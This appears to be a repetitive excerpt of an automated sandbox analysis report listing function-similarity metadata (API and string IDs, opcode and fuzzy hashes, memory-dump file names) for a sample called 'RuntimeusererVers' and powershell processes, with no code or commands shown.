                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 653bc97def7ddd28f1a173005cbf812f26c3eea3de9f75b4993d309b3b478db1
                                                                                                                                                                                                                                          • Instruction ID: 9621f63da520a93c0336dc7aa8ea2a0b9a29ebac7653002fc10db04252649926
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 653bc97def7ddd28f1a173005cbf812f26c3eea3de9f75b4993d309b3b478db1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE117939E19E4A86FB609BA0E4017BA23D5BF843A0F454235E90C827D9EF3CF6918610
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_FreeMem_Parse_Size
                                                                                                                                                                                                                                          • String ID: ascii
                                                                                                                                                                                                                                          • API String ID: 2971325497-3510295289
                                                                                                                                                                                                                                          • Opcode ID: afca6dd8bfc955c7ed0e60d353618553c28b0435e58fec6b90a0733afdd1515c
                                                                                                                                                                                                                                          • Instruction ID: be1de5a615d0889ffcc74c0e84cf8103f8f7c820fcb6acfc87a2985cd7e56537
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afca6dd8bfc955c7ed0e60d353618553c28b0435e58fec6b90a0733afdd1515c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE11D736618F8585EB10CF16E84016AB7A4FB89BE5F584236EF8D83B24DF38E551CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$OccurredString
                                                                                                                                                                                                                                          • String ID: 'del x[n]' not supported for cdata objects
                                                                                                                                                                                                                                          • API String ID: 114435612-201749645
                                                                                                                                                                                                                                          • Opcode ID: 51569ec8dff97704305aa2c744b49f6cc6b6a5d3bd267e18ea5b64da064dbc22
                                                                                                                                                                                                                                          • Instruction ID: b506c854a544eda8e1a269455909c87e6885fce762504d61e36b2c17c560dd5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51569ec8dff97704305aa2c744b49f6cc6b6a5d3bd267e18ea5b64da064dbc22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2016D31B19E81C1EE588B16E9901B96360FB88BE8F581631EF5E07B99DF6CF4918700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_FormatObject_
                                                                                                                                                                                                                                          • String ID: cdata '%s' does not support iteration
                                                                                                                                                                                                                                          • API String ID: 2473357163-1739368148
                                                                                                                                                                                                                                          • Opcode ID: 6df2a41c6c5e8ccee29f1abfbddde22a7555a9e3a27c3adad32cb6348bcd6ae5
                                                                                                                                                                                                                                          • Instruction ID: 92e8b863fa793c8fdcb1391eceb5090693c64a45eb8585e89ca2c56b6b59b50e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6df2a41c6c5e8ccee29f1abfbddde22a7555a9e3a27c3adad32cb6348bcd6ae5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73012DB6A04F45C2EF19CF56E8A01A823A0FB98FE8B041636CE1D47365DF38E4A5C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
• Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_errorY_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 3485142574-2723262194
                                                                                                                                                                                                                                          • Opcode ID: a8b50999a1deb4f36001f735a94d71a96bf2baf49509506769d5e8e0f44de373
                                                                                                                                                                                                                                          • Instruction ID: a3d0511c4abb4bdd0849e1d37f3b1c2a834304a36f36edf40dffee235c9ad8fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8b50999a1deb4f36001f735a94d71a96bf2baf49509506769d5e8e0f44de373
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4018625B08A8586EB40DB65F5445BEA391FF88BD4F444131FA8C47B96DF3CF9518A04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
• Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: a3402959f9b8482732006edcbc1b967c4b4a5d664d34c2b69162fbf4fa25a2fd
                                                                                                                                                                                                                                          • Instruction ID: 83e8ca21174b123bad0ab16afcfd04dc1a2ca2b330f140104fa38874a70b7693
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3402959f9b8482732006edcbc1b967c4b4a5d664d34c2b69162fbf4fa25a2fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A017172F08A4986FB609B55C4057A927A1FB84794F508234EA4C477E1CF7EE5D6CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
• Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 313acef978bffea86714e02ae65a3a584ea264f2087be210df51fc1ee6c682e6
                                                                                                                                                                                                                                          • Instruction ID: e2cde2b31d26a5e623d82c2b657c155586306e9f3379d2a87c5768c04e3a3b30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 313acef978bffea86714e02ae65a3a584ea264f2087be210df51fc1ee6c682e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7017172E08A45C6FB609B54D4057E927A0FB40798F908234EA4C877E5CF7DE58ACB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _PyObject_GC_NewVar.PYTHON311 ref: 00007FF81E5097D2
                                                                                                                                                                                                                                          • PyObject_GC_Track.PYTHON311 ref: 00007FF81E5097F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: PyBytes_FromStringAndSize.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E509036
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: memcpy.VCRUNTIME140(?,?,00000058,00007FF81E50971F), ref: 00007FF81E50904E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: PyDict_GetItem.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E50905D
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: _Py_Dealloc.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E509074
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: _Py_Dealloc.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E509086
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocObject_$Bytes_Dict_FromItemSizeStringTrackmemcpy
                                                                                                                                                                                                                                          • String ID: void
                                                                                                                                                                                                                                          • API String ID: 2546078241-3531332078
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • the type '%s%s' is a function type, not a pointer-to-function type, xrefs: 00007FF81E515064
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_Format
                                                                                                                                                                                                                                          • String ID: the type '%s%s' is a function type, not a pointer-to-function type
                                                                                                                                                                                                                                          • API String ID: 186121651-1909832095
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: write_raw_complex_data$write_raw_complex_data: bad complex size
                                                                                                                                                                                                                                          • API String ID: 0-1904489683
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_get0_group
                                                                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                                                                          • API String ID: 3268241200-4087598719
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_StringX_get_verify_mode
                                                                                                                                                                                                                                          • String ID: invalid return value from SSL_CTX_get_verify_mode
                                                                                                                                                                                                                                          • API String ID: 3939857436-2501269723
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_errormemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 1385177007-2868363209
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_errormemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 1385177007-2868363209
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Capsule_ImportModule_State
                                                                                                                                                                                                                                          • String ID: _socket.CAPI
                                                                                                                                                                                                                                          • API String ID: 2652237932-3774308389
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: write_raw_float_data$write_raw_float_data: bad float size
                                                                                                                                                                                                                                          • API String ID: 0-3509257061
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_ItemStringTuple_
                                                                                                                                                                                                                                          • String ID: abi
                                                                                                                                                                                                                                          • API String ID: 2162364271-3589384412
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_ItemStringTuple_
                                                                                                                                                                                                                                          • String ID: result
                                                                                                                                                                                                                                          • API String ID: 2162364271-325763347
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c$m
                                                                                                                                                                                                                                          • API String ID: 1767461275-297842231
                                                                                                                                                                                                                                          • Opcode ID: dabded245b1138d054d01c0e447c6de338ca7fe595687a8483ebc962513b1b14
                                                                                                                                                                                                                                          • Instruction ID: defc04d43cfa555f2c6594f31a2e89a884ca8883306c40656b896a3d5ad5af7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dabded245b1138d054d01c0e447c6de338ca7fe595687a8483ebc962513b1b14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CD01266B08D5986E721DF55F4006E96321F7843A4F440532EB4D02695CF3DF997DE10
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1614815258.00007FF7BDC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDC60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdc60000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f3d62a4b8b0d8daf25b900e7644f686254224be890fbeac906dcdeb9fd3d05ec
                                                                                                                                                                                                                                          • Instruction ID: 7ea345e2e6429c5b3ae207a7bf87e727d36d16a93927d9e2c3bd3bb879c1ec91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d62a4b8b0d8daf25b900e7644f686254224be890fbeac906dcdeb9fd3d05ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0813732E0DBC90FE79AAA6C58191B5BBE1EF57221B9801FBD14DC7097E9189C07C361
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1613758563.00007FF7BDB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDB90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdb90000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ebd148fbc02bfc18c3cb1aca5c4078228d44c3d2c690d159276f9cd9e4d8fa5d
                                                                                                                                                                                                                                          • Instruction ID: 2e24d88eaa76074319c8b763eb0cfe7fbee0447729367aa36207ae08b8ab6e65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebd148fbc02bfc18c3cb1aca5c4078228d44c3d2c690d159276f9cd9e4d8fa5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71E531E0CA498FDB59EB6CD8412EDBBF1EF5A320F54417AD049D7292DA38A802CB55
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1614815258.00007FF7BDC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDC60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdc60000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 58a4aebfcac063af9787b3daf58056d2b33de2cf218699b292efc5f5f8ad9be7
                                                                                                                                                                                                                                          • Instruction ID: f3a699cb9a81863a97525f68ebf44f1597fdeabc8441dc2a703acd0c6b308855
